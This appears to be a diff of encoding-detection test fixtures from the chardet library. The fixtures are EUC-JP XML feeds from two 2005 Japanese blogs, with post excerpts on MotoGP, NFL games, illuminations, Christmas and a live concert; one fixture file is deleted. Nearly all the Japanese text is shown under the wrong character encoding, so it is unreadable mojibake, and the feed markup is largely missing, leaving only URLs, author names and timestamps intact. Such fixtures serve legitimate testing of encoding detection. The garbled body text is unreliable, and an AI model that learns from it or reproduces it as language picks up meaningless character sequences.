¡ײְ־₪־ְײֳד₪ָ₪ֿ¿§₪¬°ד₪¦¡×¡׳₪ָ₪₪₪¦₪³₪ָ₪ַ¡¢ְ־₪־¿§₪ֻּב₪·₪ֶ2ַ¯´ײ₪ְ₪±ְ¸»÷₪µ₪ל₪¿¥ל¥¢₪ג₪־¡¾׀¡ֻ¡£ ¥¢¥₪¥ך¥ֳ¥·¥ו¥»¥ֳ¥¿¡¼¥ם¥´₪־¹ן°ץ₪¬¥µ¥₪¥ֹ₪ֻ₪¢₪ך₪₪¹¡£ ¿¿ֵ₪ְ₪±₪·₪«ֽת₪₪₪ֶ₪₪»₪ף₪־₪ַ¡¢10ַ¯ֱ×¼ך₪ַ₪¹₪±₪ֹ¡¢₪₪ְ₪₪ְ₪₪₪±₪₪¹¡£₪¢₪ָ10ַ¯₪ֿ³¾¡₪ַ₪¹¡× ֲח³¢ֶ₪ג»ֵ»צ₪ַ₪¹₪±₪ֹ¡¢¥¥ף¥¯¥×¥₪¥כ₪עֵֹ₪ך¹‏₪ף₪ַ¥ב¥ף¥ֶ¥¥ף¥¹¡×¡¡÷£ַ¯₪־ֵ₪ג₪ט₪ם₪·₪¯¡×... -¥­¥ד¥ף¥׳¡¦¥¢¥¦¥ָ¥ֹ¥¢ -katayama -2005-12-31T20:58:41+09:00 - - -FASTER -http://contents-factory.com/blog/archives/200512242141.php - ₪ג₪ֳ₪ֲָ®₪¯¡¢ֲ®₪¯¥¥¥ ₪³₪ל₪ֿ¡¢¥¹¥װ¡¼¥ֹ₪₪₪¦ּ¾₪־µז¶ֻ₪־¥¹¥ך¥כ₪ע ִֹ₪₪µב₪ב₪כֳֻ₪¿₪ֱ₪־¿¿¼ֲ₪־¥ֹ¥י¥₪ַ₪¢₪כ ֱ´ְ₪³¦₪ַ±ה₪35²¯¿ֽ°¾ו₪־¿ֽ¡¹₪ֻ³₪·₪₪ל¡¢2005ַ¯₪ֻ₪ְֿ₪³¦15¥צ¹סֱ´17ְן₪ע ֱט₪₪2־״¥×¡¼¥ָ¥ל¡¼¥·¥ף¥°³¦₪־ִ÷ְֵ₪ע·ט₪ב₪כ¡¢¥ֿ¥₪¥ֶ¥¯¡¿¥ֿ¥₪¥¹¥װ¡¼¥ֹ¥׀¥ָ¥כMotoGP¡£¡ײFASTER¡׳₪ֿ₪½₪־ְ₪³¦₪ֻ½י₪ב₪ֲֶ­₪עֶ§₪ֶ‏₪ל₪¿¥ג¡¼¥¿¡¼¥ֹ¥­¥ו¥ב¥ף¥¿¥ך¡¼₪ַ₪¢₪כ¡£ ¥¥ל¡¼¥·¥ח¥ף₪ֿ¡ײ¥¹¥¿¡¼¥¦¥©¡¼¥÷¡׳¥·¥ך¡¼¥÷₪ֻ½׀±י₪·¡¢¥ֿ¥ך¥¦¥ֳ¥ֹ₪­₪ֳ₪ֶ₪־¥׀¥₪¥¯¥ױ¥ך¡¼¥¯₪ָ₪·₪ֶֽ­ּ¾₪ַ׀ֽ¥¥ז¥¢¥ף¡¦¥¥¯¥ל¥¬¡¼₪¬ֳ´ֵצ¡£¥ן¥₪¥כ¥ֹ₪ּ¥ַֿ₪ָ¶ֻ¸ֲ₪־¶²ֹ₪ע¹ח₪ן₪»»‎₪ִMotoGP₪־¥¨¥­¥µ¥₪¥ֶ¥£¥ף¥°₪ַ¥ֹ¥י¥¥ֶ¥£¥ֳ¥¯₪ְ₪³¦₪ע¡¢¥¹¥¡¼¥ִ₪־ָֿ₪עִ¶₪¨₪¿¥ך¥¢¥כ₪¥ׂ¥ו¡¼¥¥ף¥ֹ¥י¥₪ָ₪·₪ֱֶֹ₪¯¡£ 2003ַ¯₪־¥«¥ף¥ּ±ַ²ט÷׳₪ֻ₪ֶ¥׳¥ל¥¥¢¾ו±ַ₪µ₪ל¡¢ֱ´ְ₪³¦₪עַ®¶¸₪µ₪»₪¿ֻ÷מ₪¬ ֳֶֻז₪ע¼ְֱצ₪¹₪כ¡×¡× FASTER -TWO WHEELS, 200MPH, EVERYMAN FOR HIMSELF- ₪־DVDֵ‏ֳו¡×¡¡ 9·מ10ֶּכ¡¢¥ֶ¥¢¥ָ¥כ¿·½ֹ₪ַ₪¿₪ֳ₪¿°ל²ף₪ְ₪±¾ו±ַ₪µ₪ל₪¿¡ָFASTER¡ֹ¡£ְהֲ׀₪ֻ¸«₪¿₪«₪ֳ₪¿₪±₪ֹ¡¢»ֵ»צ₪־ֵװ¹ח₪ַ¹װ₪±₪÷¡¢DVD₪־ָ¯ַה¥ך¥ך¡¼¥¹₪ֶָ±»‏₪ֻֽ½ּף₪·₪₪·₪¿¡£... -¥ג¡¼¥¿¡¼¥¹¥¡¼¥ִ -katayama -2005-12-24T21:41:50+09:00 - - -²׀»צ¡× -http://contents-factory.com/blog/archives/200512201356.php - ²¿»צ₪«₪ָ»׳₪ֳ₪¿₪יג₪₪₪ֶ£±¬₪־¥¥ף¥·¥ח¥ף₪ַ²׀»צ¡×¡¡₪¹₪°₪ֳִֻ²׀₪·₪₪·₪¿¡¼¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-12-20T13:56:57+09:00 - - -ְֵ²₪ל -http://contents-factory.com/blog/archives/200512191911.php - ÷£ִ«₪ֹֿ¹ְֵ²¼₪ֻ₪ג₪₪ֳ₪¿´¨₪₪ֶ¡£ֹק₪ג¶¯₪¯₪ֶ¡¢¸ר±א₪־ֽמ₪ֱֽױ₪¬ֹס₪ֳ₪ֶ₪₪₪₪¹¡£ ₪ַ₪ג¡¢±ְ°ל₪ִ₪₪₪¥­¥ל¥₪₪ְִ¶ץ₪ַ₪¹¡£... -ְִ¶ץ -katayama -2005-12-19T19:11:10+09:00 - - -¥₪¥ף¥ַ¥£¥¢¥¥¥ך¥¹¡¦¥³¥כ¥ִ₪¬÷£µ¨½יַװְן¡× -http://contents-factory.com/blog/archives/200512191100.php - NFL 2005ַ¯¥·¡¼¥÷¥ף¡¡Week15¡¢¥₪¥ף¥ַ¥£¥¢¥¥¥ך¥¹¡¦¥³¥כ¥ִvs¥µ¥ף¥ַ¥£¥¨¥´¡¦¥ֱ¥ד¡¼¥¸¥ד¡¼¥÷ְן₪¬G+₪ְַ¸ֳז·ׁ₪µ₪ל₪₪·₪¿¡£₪µ₪¹₪¬₪ֻµ¯₪­₪ֶ₪₪₪י₪ל₪₪₪₪־₪ַ¡¢₪ֱ₪ח₪ֳ₪ֱָבµ¯₪­₪·₪ֶֿ¿²ט₪ע¥ֱ¥§¥ֳ¥¯¡£ ¥³¥כ¥ִ₪ֿ₪³₪³₪₪ַ13ְן13¾¡₪ְָה¹¥ִ´₪ַ¡¢₪¹₪ַ₪ֻAFCֶמֳֿ¶טֽ¥¾¡₪ע·ט₪ב₪ֶ₪₪₪כ¡£13ֿ¢¾¡₪ֿNFL»ֻ¾ו£´¥ֱ¡¼¥אּ₪־ֲחµ­ֿ¿₪ַ₪¹₪±₪ֹ¡¢₪ֹ₪¦₪»₪₪י16ְןֱ´¾¡₪ֻ´ֲװ₪·₪ֱ₪ד₪₪₪₪¹¡£ ₪·₪«₪·¡¢₪·₪«₪·¡ִ¡ִ¡£¥ֱ¥ד¡¼¥¸¥ד¡¼¥÷₪¬¥³¥כ¥ִ₪־ֳּֿ£₪¹¶·ג₪ע₪·₪־₪®₪­₪ך¡¢QB¥ײ¥ך¡¼¥÷₪־ֲח³טּצ₪ַ¥³¥כ¥ִ₪ע17ֲ׀26₪ַַֻ₪כֲח¶גְ±¡×¡¡¥³¥כ¥ִ₪ֿ3rd¥¯¥©¡¼¥¿¡¼₪ָֻ¿·ג₪·₪₪·₪¿₪¬¡¢4th¥¯¥©¡¼¥¿¡¼₪עֽ₪¨₪י₪ל₪ֶ¥־¡¼TD¡£₪₪₪ה¡¼¡¢₪₪₪₪»מ¹ח₪ַ₪·₪¿¡×... -¥¢¥ב¥ױ¥ָ -katayama -2005-12-19T11:00:44+09:00 - - -Winter Vista Illuminations -http://contents-factory.com/blog/archives/200512172330.php -²ֲָ²₪ָ°ל½ן₪ֻ¡¢־©ְמ₪־¾¼ֲֿµ­ַ°¸ר±א₪ַ³«÷ֵ₪µ₪ל₪ֶ₪₪₪כWinter Vista Illuminations₪ֻ¹װ₪ֳ₪ֶ₪­₪₪·₪¿¡£ ²ֶ₪־¥­¥ד¥ף¥׳°ֽט¡¢²ֲָ²°ל½ן₪ֻ½׀₪«₪±₪כ₪³₪ָ₪ג₪₪«₪ֳ₪¿₪־₪ַ¡¢µ׳₪·₪ײ₪ך₪ֻ²ֲָ²¥µ¡¼¥׃¥¹¡¾׀¡ֻ¡£ ּף6545¸ִ₪־¥·¥ד¥ף¥ׁ¥ף¥°¥י¥¹₪ַ÷מ₪י₪ל₪¿¡¢¹ג₪µ£¶m₪־µנֲח¥·¥ד¥ף¥ׁ¥ף¥ִ¥ך¡¼¡×¡¡ 3311¸ִ₪־₪ג₪־₪¬£²₪ִ¡¹ג₪µ4m¡ֻ₪ָ¡¢¥¥ֻ¥·¥ד¥ף¥ׁ¥ף¥°¥י¥¹¥ִ¥ך¡¼₪¬100¸ִ₪גֲ₪ף₪ַ₪₪₪₪¹¡£ ֵ₪־²ײ²׀₪ֿ8»‏₪«₪י¡£₪₪«₪₪«¸«»צ₪¥₪¥¥ף¥ָ₪ַ¡¢´¨₪₪ֳז½׀₪«₪±₪¿²ֱֳֽ₪¬₪¢₪ך₪₪·₪¿¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-12-17T23:30:21+09:00 - - -²¶₪ֿ÷£¡¢¥ג¡¼¥ל¥ִ₪ֻ₪¦₪ל₪·₪₪₪¼¡× -http://contents-factory.com/blog/archives/200512162103.php -8·מֻצ₪«₪י₪½₪ם₪½₪ם₪ָ¥¹¥¿¡¼¥ָ₪·¡¢ֵ׃ֳז₪ַַתָ¯ֵ×₪ֶֻ°₪­½׀₪·₪ֶ¡¢ ֵ¹₪־ֶ¡¹₪עִ¶₪¨₪ֶ¡¢ֶֻֽ¼‎¡¢ֻ¿¥µ¥₪¥ָ₪־¥ך¥ֻ¥ו¡¼¥¢¥כ¥×¡¼¥׳¥ף¡× ÷ַ¸ו₪־÷ַ¸ו₪ַ¡¢cgi₪ַ°ת₪ֳ₪«₪«₪ֳ₪ֶµד₪­₪½₪¦₪ֻ₪₪ֳ₪¿₪±₪ֹ¡¢ ּµ»צ₪ֶֻ°₪­½׀₪·₪ֶ¡¢¥¥ֳ₪ָ₪ׂ₪ֲָ©¡ִ¡ִ¡£ ₪₪₪µ₪ף¡¢ֵֻצ₪ֵֻֻצ₪ֻ₪×ָט₪ל₪µ₪₪ַ₪·₪¿₪ֳ¡× ₪³₪ל₪ַ°ֲ¿´₪·₪ֶ1ַ¯₪ע½×₪¨₪כ₪³₪ָ₪¬₪ַ₪­₪½₪¦₪µ₪¬₪ַ₪¹¡£ ₪¢¡¢ּ₪־¥µ¥₪¥ָ₪עִ¶ֳֶµ₪ַ¹¹¿·₪·₪₪­₪ד¡ִ¡ִ¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-12-16T21:03:28+09:00 - - -÷£ֶ₪ג¼®־± -http://contents-factory.com/blog/archives/200512142321.php - ÷£ֶ₪ג¼®־±ֻ¿¼ׂ₪ַ²סµִ¡£ֻ¿¥׃¥כ28³¬₪־¥¨¥ל¥¡¼¥¿¡¼¥¡¼¥כ₪«₪י¿·¶¶‎ּּ₪ע¥ׁ¥ֱ¥ך¡£ ÷£ּכ₪־ּכ·₪ֿ₪ֱ₪ח₪ֳ₪ָ¥¢¥ף¥ְ¡¼ּ₪ַ»£₪ֳ₪ֶ₪₪₪·₪¿₪¬¡¢₪ֱ₪ח₪ֳ₪ָ¥¢¥ף¥ְ¡¼²ב₪®¡ִ¡ִ¡£ ³¹₪ֿ₪½₪³₪יֳז₪ֻ¥¯¥ך¥¹¥¥¹₪־¥₪¥כ¥¥ֽ¡¼¥·¥ח¥ף¡£ֽט½µ₪ֿ¥¯¥ך¥¹¥¥¹₪ַ₪¹¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-12-14T23:21:24+09:00 - - -¶ה°ֹ -http://contents-factory.com/blog/archives/200512091339.php - 12·מ₪ֻ₪₪ֳ₪ֶ¡¢₪ה₪ֳ₪ָ¶ה°ֹ₪־ֽױ₪¬»¶₪ך»ֿ₪ב₪₪·₪¿¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-12-09T13:39:33+09:00 - - -¥¯¥ך¥¹¥¥¹₪ְ₪ֽ -http://contents-factory.com/blog/archives/200511302133.php - ֽ¼‎₪«₪י¼®־±₪ַ²סµִ¡£µ¢₪ך₪ֿ₪µ₪¹₪¬₪ֻ´¨₪¯₪₪ך₪₪·₪¿₪ֽ¡£ ₪¢₪ֱ₪³₪ֱ₪ַ¥¯¥ך¥¹¥¥¹¥ִ¥ך¡¼₪¬¸ק₪ֳ₪ֶ₪₪₪₪¹¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-11-30T21:33:38+09:00 - - -÷£ַ¯₪־¹ָֽױ₪ֿ÷£₪ׂ₪ָ₪ִ¡ִ¡ִ₪«₪¡© -http://contents-factory.com/blog/archives/200511301334.php - ֳָ₪«₪₪½©₪ְ₪ֳ₪¿₪־₪ַ¡¢÷£ַ¯₪־¹ָֽױ₪ֿ₪¢₪₪ך₪ֿ₪ֳ₪­₪ך₪·₪₪₪¿§¡£µמַ¯₪ֿ¿¿₪ְֳײ₪ְֻק₪₪ֳ₪¿¶ב½ך₪־¸ר±א₪־¹ָֽױ₪ג£ֻז₪¿§₪־₪₪₪ַ₪¹¡£... -ְִ¶ץ -katayama -2005-11-30T13:34:47+09:00 - - -ְֶּ₪«₪י»ױֱצ -http://contents-factory.com/blog/archives/200511301332.php - ÷£ַ¯₪ג¥ֹ¥¿¥׀¥¿₪·₪ֶ₪₪₪כ´ײ₪ֻ¡¢11/12₪¬½×₪ן₪ֳ₪ֶ₪·₪₪ֳ₪ְֶֶּ₪«₪י12·מ¡£ °ל÷עֶ₪ֳֿ¶¶₪ַ²סµִ¡¢÷£ֶ₪ג¼®־±₪ַ²סµִ¡£·מֻצ₪ְ₪ג₪ף₪ֽ¡£₪ֱ₪ח₪ֳ₪ָֻ»₪·₪₪¡£... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-11-30T13:32:51+09:00 - - -"Lerning From Google" -http://contents-factory.com/blog/archives/200511152339.php -Foxnews ₪־"Lerning From Google"₪ָ₪₪₪¦µ­»צ¡£ "The top executives at Google recently admitted that they kind of let their employees invent and develop whatever they think is cool and the company has no problem putting it online to see what happens." ֳזֵחֱן₪µ₪ף₪־blog¡¢Life... -PC¡¦¥ֽ¥ֳ¥ָ´״·¸ -katayama -2005-11-15T23:39:08+09:00 - - -¥¹¥ֶ¥£¡¼¥ײ¡¦¥¸¥ח¥ײ¥÷»ב₪ֻ³״₪ײ¡ײ»ֵ»צ₪־°ױµֱ¡¦¿ְֽ¸₪־°ױּ£¡׳ -http://contents-factory.com/blog/archives/200511152327.php -¥¹¥ֶ¥£¡¼¥ײ¡¦¥¸¥ח¥ײ¥÷»ב₪ֻ³״₪ײ¡ײ»ֵ»צ₪־°ױµֱ¡¦¿ְֽ¸₪־°ױּ£¡׳ ¡ֱ¥¹¥¿¥ף¥ױ¥©¡¼¥ֲֹח³״ֲ´¶ָ½ֻ²ל¥¹¥װ¡¼¥ֱ₪ט₪ך¡ֱ ₪½₪³₪יֳז₪ֲֳַֿך₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¹₪ַ₪ֻ₪₪₪µ₪ף₪´ֲ¸ֳ־₪«₪ָ»׳₪₪₪₪¹₪¬¡¢°ל±‏¡ִ¡ִ¡£ ₪₪ְ₪־‎₪ֿ₪¼₪ֶֹׂ₪ף₪ַ₪₪ֶ₪¯₪ְ₪µ₪₪¡£ ֱ°װ ¸וװ... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2005-11-15T23:27:43+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/furusatonoeki.cutegirl.jp.xml b/chardet/tests/EUC-JP/furusatonoeki.cutegirl.jp.xml deleted file mode 100644 index d38598b..0000000 --- a/chardet/tests/EUC-JP/furusatonoeki.cutegirl.jp.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -₪ױ₪כ₪µ₪ָ₪־±״ -http://furusatonoeki.cutegirl.jp/main/ - -ja - -2005-10-26T23:33:37+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -¡ײ¹¬₪»₪ֳ¡×¡׳₪»°½½ֿ©₪־¥¹¥¿¡¼¥ָ -http://furusatonoeki.cutegirl.jp/main/archives/001190.html -¶׀₪ב₪ְ₪·₪ֶ£¶ַ¯ָ¾₪־ֳז₪ַ°לָײֻ»₪·₪«₪ֳ₪¿₪ף₪¸₪ד₪₪₪₪«₪₪¢¡£ £¸·מ₪«₪יְ·׳₪עֳ´ֵצ₪·₪¿°ֶ·ן₪¬₪ֹ₪¦₪ֻ₪«°לֳֽמ¡£ ¥ֿ¥ן¥₪₪ָ£³¥«½ך₪־₪₪ֱ¥³¥ף°³°₪ֿ₪₪ָ₪ף₪ֹ»ֵ»צִׂ₪±¡£ £²¥צ·מ´ײ₪־ִך»‏´ײ³°ֿ«ֶ¯»‏´ײ£²£°£°»‏´ײ¼ו¡£ £²£°ֲו¥י¥¹¥ָ£³¥צ·מ₪ע»ֵ»צ₪ָ₪₪ֳ₪ֱ₪ְ₪±₪ַ²ב₪´₪·₪¿₪³₪ָ₪ֻ₪₪כ₪ן₪±₪«¡££ק ₪₪ֳ¡¢₪₪ֱ¥ע¥¿ֵ×₪ֻ₪ֱֿ´ֱ³¥¢¥ך₪₪³₪ָ₪«₪¡£ ₪ָ₪₪₪¦₪³₪ָ₪ַ¡¢µמ₪כ£±£°·מ£²£µֶ₪ֻּ½׀ֵ₪¯»°½½ֿ©₪ָ₪¢₪₪₪₪ך₪₪·₪¿¡£ £²£²¡₪£²£³ֶ₪־ֲחµ₪ַ₪־₪´₪₪₪ֱ¥³¥ף2DAYS¡£ ¸ִ¿ֵֽ×₪ֻ₪ְֲֳֿ¸ֱֶ°ּכ÷׳₪ָ¾¡¼ך₪ֲֳַֻּ₪ֳ₪ֶ₪₪₪₪·₪¿¡£ £²£²ֶ₪ֽֿ¾ֽµ₪¬₪¢₪ל₪׀¡¢₪´₪¥³¥ףֳכ₪ע´ׁ₪ט₪¦₪«₪₪ָ¹ֽ₪¨₪ֶ₪₪₪¿₪±₪ֹ¡¢ ·כ¶ֹ₪½₪ל₪ֿ₪·₪₪₪₪ַ¡¢¥ב¥₪¥ף¥₪¥¥ף¥ָ₪־₪₪₪ִ₪ג₪־£שִג¾ֳֶסֽ§₪־²ץ¡£ ₪ׂ₪µ₪ײ₪ך₪ֻµ₪»‎₪ֱ₪־₪₪₪₪¡¢ּ‏₪µ₪ל₪כ¡¢ּף£³¥צ·מ´ײ₪־ָט₪ל₪¬¥¹¡¼¥ֳ₪ָ¾ֳ₪¨₪¿ ¼ע₪ע´®ַ½¡£ ₪½₪·₪ֶֽגֶ₪־₪₪ֱֲחµ¥³¥ף¡£ ּכ¸ר±י₪¬½×₪ן₪ֳ₪¿¸ו¡¢¥¥ף¥ָ₪ב₪ֱ₪ד₪¯₪ֱ₪דְ¶¡¹₪·₪₪ֱײ²ק₪µ₪¬₪ַ₪·₪¿¡£ ּ‏₪µ₪ל₪כ₪ָ₪₪₪¦₪־₪ֿ₪³₪¦₪₪₪¦¥³¥ָ₪₪־₪«₪₪¢₪ָ»׳₪₪₪₪·₪¿¡£ ֽגֶ₪ֿ־¯₪₪ֳ₪ֶ₪₪₪כֲוµ₪ע»ָֽׁ₪·₪ֶµ₪¡£ ַ¯ֶג₪ֻ¹ֽ₪¨₪ֶ₪₪₪כ°ל¿ֽכ₪י₪·₪־½אָק₪ג·ף₪ֽ₪ֶֹפ²°₪־ֱ½₪ע₪·₪ֶ¡¢ µ­ַ°₪¹₪₪­»°½½ֿ©₪ע·₪¨₪₪·₪¿¡££ק ·₪¨₪¿₪¯₪₪«₪ֳ₪¿ֲחֲז₪ֶֶֻֽ‏₪·₪ֶ₪·₪₪ֳ₪¿₪ן₪±₪ְ₪±₪ֹ¡¢ ₪³₪ף₪´¶₪¸₪ַ¡¢₪₪«₪₪«½¼¼ֲ₪·₪¿µ₪»‎₪ֱ₪־¥₪¥₪£³£°÷׀₪־¥¹¥¿¡¼¥ָ₪ָ₪₪ך₪₪·₪¿¡£ ₪ָ₪₪₪¦₪³₪ָ₪ַ¡¢₪₪ֱ₪₪ֱ¹¹¿·÷ֶ³«¡£... -₪ױ₪כ₪ֻ₪­ -₪ױ₪כְ¸₪­ -2005-10-26T23:33:37+09:00 - - -£²£´¥«¥י¥ֳ¥ָ¥ִ¥¢¡¼´»³ֲ®ף -http://furusatonoeki.cutegirl.jp/main/archives/001189.html -¥ֿ¥ן¥₪¸ו₪גֿ¢ֶ»ֵ»צִׂ₪±¡£¿¶ׁ¿חּ²»‏´ײ£²»‏´ײ¼ו¡£₪½₪ל₪ג₪³₪ל₪ג₪×µֽֽׂ₪־°₪ַ₪ֿ₪₪¯₪³₪־ֶ₪־°₪ֻ´טִ¥₪ֳ₪ֶ₪­₪₪·₪¿¡£ ¥ֿ¥ן¥₪¸ו₪־₪₪ֳ₪ֱ₪ֿ₪¹₪ֳ₪­₪ך₪ָ₪·₪¿ֹ½¾נ₪ע₪·₪ֶ¡¢₪₪¹₪₪¹¾׀´י־צ¥ׁ¥ן¡¼¥¢¥ֳ¥׳₪·₪ֶ₪₪·₪¿¡£ ֶגֶֽ₪ֽֿ½ֱִּ₪ך¥«¥׀¡¼¶₪¬ֲ¿₪«₪ֳ₪¿₪ג₪־₪־¡¢¸ֵ»²¥ע¥¿₪ֻ₪ֿ₪¿₪₪י₪₪₪¥¥ִ¥«¥·¥₪¥¥ף¥׀¡¼₪¬₪¢₪ך₪₪·₪¿¡£ ₪½₪ל₪ֿ¡ײ־ד₪¨₪׀¡׳ ½×־»¸ו₪₪ף₪¸‎₪עֲ·₪¨₪ֶ¡¢ֲט£±ְ¼₪¬¡ײ־ד₪¨₪׀ֽט₪¿₪«¡¼¡׳₪ַ₪·₪¿¡£ £ֿ£ּ₪־»צ¾נ₪הְ²₪ל¸ו₪¬₪µ₪¯₪יֻ‏³«₪ֻׁ₪ן₪ֳ₪¿₪ך¡¢°¦¼ײ¥ם¥ף¡¼₪¬ֽט₪¿₪ך₪ַ¡¢¥«¥׀¡¼₪ַ₪ג₪₪ֳ₪ֱ₪ֻ¹ח₪¦¶₪עֱ×¶₪·₪ֶ₪₪₪ֶ¡¢÷£²ף₪ג÷ַ¹ג₪ֻ¹¬₪»₪µ₪¬₪ֻ₪₪ל₪כ¥י¥₪¥ײ₪ֻ₪₪ֳ₪ֶ₪₪₪₪¹¡£ ₪µ₪ֶ¡¢ּכ₪¬»ֿ₪₪ך₪₪¹¡£... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כ₪­₪·₪ד -2005-09-18T18:23:19+09:00 - - -₪¿₪ְ₪₪₪¡×¥ֿ¥ן¥₪₪ט₪ךּµ»צµ¢´װ -http://furusatonoeki.cutegirl.jp/main/archives/001188.html -ּµ»צ¥ֿ¥ן¥₪₪ט₪ךµ¢´װֳ׳₪·₪₪·₪¿¡£ ֲ‏÷£ְ®ִֵ₪ַ₪¹¡£ ₪ג₪¦¡¢÷ַ¹ג¡¢´¶ֶ°¡£ ¥ֿ¥ן¥₪₪ֵֿ·¹ס₪ַ₪·₪¿¡£ ¹¬₪»₪¹₪®₪ֶ₪³₪־ְ₪₪«₪י₪₪₪₪¯₪₪ֳ₪ֱ₪ד₪₪₪½₪¦₪ַ₪¹¡£¡£±ֶּ¸ב¸ו¥₪¥¥ף¥ָ₪־₪₪ֳ₪ֱ₪־¸ְֽױ₪ט₪ך¡ֻ ¥ל¥₪ִֹֿ₪ֳ₪ֶ½ס₪­₪₪¹₪¬¡¢ ₪ָ₪ך₪¢₪¨₪÷¡¢£²ֶּ₪־ֲ®ף₪ָ₪·₪ֶ₪ֿ¡¢ ₪ִ₪₪₪ֲֻװֻ¾₪־¿·¶¡ײ־ר₪־²ײ¡׳₪¬¥י¥₪¥ײ₪ַ½יָהֿ×₪µ₪ל₪₪·₪¿¡£ ²־₪₪½×₪ן₪ֳ₪¿½ײ´ײ¡¢´¶¶ֻ₪₪ֳ₪ֶ¡¢־₪°₪א₪₪ֳ₪ֱ¡£ ÷£ֶ₪³₪־»‏₪־°₪ֻֻ¾₪ף₪ְ¿´¶­₪עֵַֿ×₪·¡¢ ÷£²ף₪־¿·¶₪״₪־»׳₪₪₪ע¹נַע¡£ »ה₪ע´₪בֲ¿₪¯₪־¥ױ¥¡¥ף₪¬₪¹₪¹₪ךµד₪¯¡¢´¶ֶ°ֵ×₪½׀ֽט»צ₪ָ₪₪ך₪₪·₪¿¡£ ₪½₪·₪ֶ¡¢¼¡¶¡£¥ױ¥¡¥ף₪״₪־»׳₪₪₪ע¹‏₪ב₪ֶ²־₪₪₪₪¹₪ָ¸ְ₪ֳ₪ֶ¡¢¡ײ¶ץ¡¡LIFE¡ִ¡׳¡£ ₪₪ֳ₪ֱ₪־²־₪״₪־»׳₪₪¡¢¥ױ¥¡¥ף₪״₪־»׳₪₪₪¬₪ׂ₪·₪ׂ₪·₪ֱֵָ₪ן₪ֳ₪ֶֽט₪ֶ¡¢ ²‏₪ב₪ֶ¡¢₪₪ֳ₪ֱ₪״₪־°¦₪עְְ₪ֳ₪¿ְֱַ²₪י₪·₪₪¥י¥₪¥ײ₪ַ₪·₪¿¡£ ₪½₪·₪ֶ¡¢ֿ¯ף¡£ £±£±·מ₪ֻ¥ױ¥¡¥ף₪־½¸₪₪₪¬³«÷ֵ₪µ₪ל₪כ₪³₪ָ₪¬ָ¯ֹ½₪µ₪ל₪₪·₪¿¡£ ÷£₪־₪ָ₪³₪ם¡¢£²²ף₪־ֽ½ִך₪ְ₪½₪¦₪ַ₪¹¡£ ₪ָ₪ֻ₪«₪¯₪ב₪ֳ₪ֱ₪ד³₪·₪«₪ֳ₪¿¡£ ½¼¼ֲ₪·₪¿ְֱַ²₪י₪·₪₪£³ֶ´ײ₪ַ₪·₪¿¡£... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כְ¸₪­ -2005-08-30T13:10:28+09:00 - - -ֲט£±ֳֶ£²¥·¥ח¥ֳ¥ָ»£±ֶ -http://furusatonoeki.cutegirl.jp/main/archives/001187.html -₪½₪¦ֽט₪¿₪«¡× ₪₪ֳ₪ֱ¥ֿ¥ן¥₪₪ַֽב°ב₪ַ₪¹¡£ ְײ₪־־ֳ₪·₪²₪ֽב°ב₪ַ·ד¥ה¥׀₪­₪ד₪ן₪₪₪ַ₪¹¡£ ₪³₪ֱ₪י₪ֽֿ½ִךִּ₪ך¡¢ְטֶ₪־ְ®ִֵ¥ע¥¿¥«¥י£װ¥·¥ד¥ִ₪עֳו₪ֶ¡¢ ₪ױ₪כ₪µ₪ָ₪־£ֳ£ִ₪ע₪ג₪ֳ₪ֶ¡¢ֻ¾₪₪₪·₪¿¡£ ֶ‏₪ֳ₪ֶ¡¢₪₪ֳ₪ֱ₪ָ´י₪ע²ס₪ן₪»₪¿½ײ´ײ¡¢ ¡ײ₪¢₪¡¡¼₪ֳ¡×₪×₪ֿ₪ט₪¦₪´₪¶₪₪₪₪¹¡£¡׳ ₪ג₪¦₪׀₪ֳ₪ֱ₪ך¡¢ַ§¼±₪µ₪ל₪ֶ₪₪₪כ₪ן₪±₪ַ₪¹¡££צ °§»¢₪ע₪·₪¿¸ו¡¢¥«¥ב¥י₪ֻ¸‏₪«₪ֳ₪ֶ¡¢¥¡¼¥÷₪ע₪ָ₪כ₪ָ₪³₪ם₪ַ¡¢ ₪³₪ֱ₪י₪¬ַ״₪¬¹ג₪₪₪¿₪ב¡¢¥¹¥¿¥ֳ¥ױ₪ֻ¡ײ₪ג₪¦¾¯₪·₪·₪ד₪¬₪ף₪ַ₪¯₪ְ₪µ₪₪¡£¡׳ ¡ײ₪₪₪ה¡¢₪ג₪¦¾¯₪·¡׳₪ָ£³ֵ₪₪ֹ¸ְ₪ן₪ל₪ֶ¡¢₪«₪₪ך¾׀´י₪ֲַֿ₪ה₪«₪ֻ »£±ֶ₪ַ₪­₪₪·₪¿¡£ ₪µ₪ֶ¡¢₪ֹ₪־₪ט₪¦₪ֻ½׀ֽט¾ו₪¬₪ֳ₪ֶ₪₪₪כ₪«¡£ £ֳ£ִ₪¬־¢₪ֻ₪₪ֳ₪ֶ₪¿₪י₪«₪₪ך₪×₪ג₪ם₪₪₪ף₪ְ₪±₪ֹ¡££ק... -₪₪ֱ¥³¥ף¥ל¥ -₪ױ₪כְ¸₪­ -2005-08-28T08:46:04+09:00 - - -ּµ»צ¥ֿ¥ן¥₪ֵ‏ֳו -http://furusatonoeki.cutegirl.jp/main/archives/001186.html -ּµ»צ¥ֿ¥ן¥₪₪ֵֻ‏ֳו₪·₪₪·₪¿¡£ ¸«»צ₪₪₪ַ₪־¥¹¥«¥₪¥ײ¥כ¡¼¡× ₪ֿ₪ֳ₪­₪ך¸ְ₪ֳ₪ֶ¡¢ֶֻ₪־₪₪¦₪¬½כ₪₪¡× ₪³₪ֱ₪י₪ָֿע½כֳֿ₪ָ¸ְ₪ֳ₪ֶ₪ג₪₪₪₪₪¯₪י₪₪¡£ 